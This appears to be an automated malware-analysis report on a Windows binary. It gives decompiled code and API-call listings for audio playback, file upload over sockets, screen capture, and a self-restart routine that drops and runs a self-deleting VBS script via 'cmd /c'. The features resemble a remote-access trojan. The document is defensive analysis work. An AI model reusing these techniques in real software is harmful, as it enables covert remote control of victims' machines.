					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                                                                0x00411d8a
                                                                                0x00411d9b
                                                                                0x00411da9
                                                                                0x00411dae
                                                                                0x00411dbb
                                                                                0x00411dc0
                                                                                0x00411dc7
                                                                                0x00411dd0
                                                                                0x00411dd0
                                                                                0x00411dd9
                                                                                0x00411de4
                                                                                0x00411f46
                                                                                0x00411f55
                                                                                0x00000000
                                                                                0x00411f5b
                                                                                0x00411f69
                                                                                0x00411f79
                                                                                0x00411f79
                                                                                0x00411dea
                                                                                0x00411dea
                                                                                0x00411df9
                                                                                0x00411dff
                                                                                0x00411e04
                                                                                0x00411e07
                                                                                0x00411e24
                                                                                0x00411e2d
                                                                                0x00411e36
                                                                                0x00411e3a
                                                                                0x00411e43
                                                                                0x00411e47
                                                                                0x00411e50
                                                                                0x00411e54
                                                                                0x00411e5f
                                                                                0x00411e68
                                                                                0x00411e71
                                                                                0x00411e7a
                                                                                0x00411e86
                                                                                0x00411e8d
                                                                                0x00411ea1
                                                                                0x00411eb1
                                                                                0x00411ec1
                                                                                0x00411ecb
                                                                                0x00411ed3
                                                                                0x00411ed8
                                                                                0x00411ede
                                                                                0x00411ee4
                                                                                0x00411eee
                                                                                0x00411ef0
                                                                                0x00411ef0
                                                                                0x00411efc
                                                                                0x00411f06
                                                                                0x00411f08
                                                                                0x00411f08
                                                                                0x00411f1a
                                                                                0x00411f1c
                                                                                0x00411f21
                                                                                0x00411f24
                                                                                0x00411f24
                                                                                0x00411f26
                                                                                0x00411f2a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00411f2e
                                                                                0x00411f42
                                                                                0x00411f42
                                                                                0x00411f30
                                                                                0x00411f30
                                                                                0x00411f33
                                                                                0x00411f38
                                                                                0x00000000
                                                                                0x00411f3a
                                                                                0x00411f3b
                                                                                0x00411f3d
                                                                                0x00411f40
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00411f40
                                                                                0x00411f38
                                                                                0x00000000
                                                                                0x00411f2e
                                                                                0x00411f83
                                                                                0x00411f85
                                                                                0x00411f88
                                                                                0x00411f8a
                                                                                0x00411f92
                                                                                0x00411f92
                                                                                0x00411fab
                                                                                0x00411fb3
                                                                                0x00411fb9
                                                                                0x00411fb9
                                                                                0x00411fbf
                                                                                0x00411ede
                                                                                0x00411fd3
                                                                                0x00411fdd
                                                                                0x00411fed
                                                                                0x00411ffd
                                                                                0x00412005
                                                                                0x00412005
                                                                                0x0041200e
                                                                                0x00412018

                                                                                APIs
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                                                                • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                                                                • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                                                                • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                • API String ID: 1753768752-1354618412
                                                                                • Opcode ID: beea15c7e81453496181421b30bccfdca987ef143b40d39aa22c98d8107df55b
                                                                                • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                                                                • Opcode Fuzzy Hash: beea15c7e81453496181421b30bccfdca987ef143b40d39aa22c98d8107df55b
                                                                                • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                                                • #16.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                                                                • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printf
                                                                                • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                                                                • API String ID: 3223420877-3166941866
                                                                                • Opcode ID: 4055f939dca469a4e5ddffa646131ea7b2e53c68ffbfd210837f8897da2efe7c
                                                                                • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                                                                • Opcode Fuzzy Hash: 4055f939dca469a4e5ddffa646131ea7b2e53c68ffbfd210837f8897da2efe7c
                                                                                • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004089A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                                                                • _wgetenv.MSVCRT ref: 00408A1B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                                                                • exit.MSVCRT ref: 00408B3D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                                                                • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                                                                • API String ID: 864010295-1332127163
                                                                                • Opcode ID: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                                                                • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                                                                • Opcode Fuzzy Hash: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                                                                • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F5F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                  • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                                                                • _itoa.MSVCRT ref: 0040F75C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                                                                  • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                                                                  • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                                                                  • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
